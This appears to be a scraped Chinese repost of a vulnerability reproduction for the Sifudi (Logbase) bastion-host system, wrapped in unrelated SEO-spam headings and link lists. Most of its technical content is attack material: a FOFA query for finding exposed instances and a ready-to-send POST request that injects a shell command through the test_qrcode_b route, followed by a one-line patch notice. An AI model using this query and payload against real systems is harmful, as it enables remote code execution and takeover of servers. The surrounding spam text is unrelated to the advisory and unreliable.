当前位置: 首页 > news >正文

网站操作体验学市场营销后悔死了

网站操作体验,学市场营销后悔死了,大学两学一做网站,邯郸网站建设产品介绍0x01 产品简介 思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。 0x02 漏洞概述 由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限&#…

0x01 产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。

0x02 漏洞概述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:

((title="Logbase" || header="Server: dummy" || body="onclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"

0x04 漏洞复现

PoC

POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: closez1=1&z2="|whoami;"&z3=bhost

0x05 修复建议

厂商已发布了漏洞修复程序,请及时关注更新:

http://www.logbase.cn/

http://www.rdtb.cn/news/18687.html

相关文章:

  • 做电子外贸网站建设磁力狗在线引擎
  • 中山做营销型网站公司近三年成功的营销案例
  • 网站建设明细报价表 xls好看的seo网站
  • 做电影网站如何推广竞价推广开户公司
  • 安利的网站谁做的西安seo关键字优化
  • 网站ww正能量品牌公关公司
  • 合肥企业网站建设网络营销手段有哪些
  • 网站图片怎么替换国际新闻稿件
  • 投资公司网站建设方案最火的网络推广平台
  • 如何建设cpa影视网站佛山seo
  • 宣传网站建设重庆百度seo
  • 建网站的公司哪个好在线推广企业网站的方法有
  • 阿里网站建设需要准备什么软件数字营销网站
  • 做食品企业网站的费用成人大专
  • 网站系统建设招标顺德搜索seo网络推广
  • 广元市建设局网站如何免费创建自己的网站平台
  • b2c商城网站建设简述网络营销与传统营销的整合
  • 做网站一般链接什么数据库怎么制作属于自己的网址
  • 小游戏网站怎么做建站seo怎么做教程
  • 阳泉购物网站开发设计网站排名优化怎样做
  • wordpress max page网站排名优化公司
  • 网页设计版面设计图seo优化方案项目策划书
  • 个人网站如果做搜索引擎营销简称
  • 小店怎么做网站seo网站优化案例
  • 怎么盗号网站怎么做百度推广总部电话
  • 北京城建道桥建设网站平台优化是什么意思
  • 做ppt的软件怎样下载网站新闻最新消息10条
  • 做视频网站视频湖南优化推广
  • 网站如何做排名靠前网络推广员具体做什么的
  • 深圳定制网站建设关键词推广优化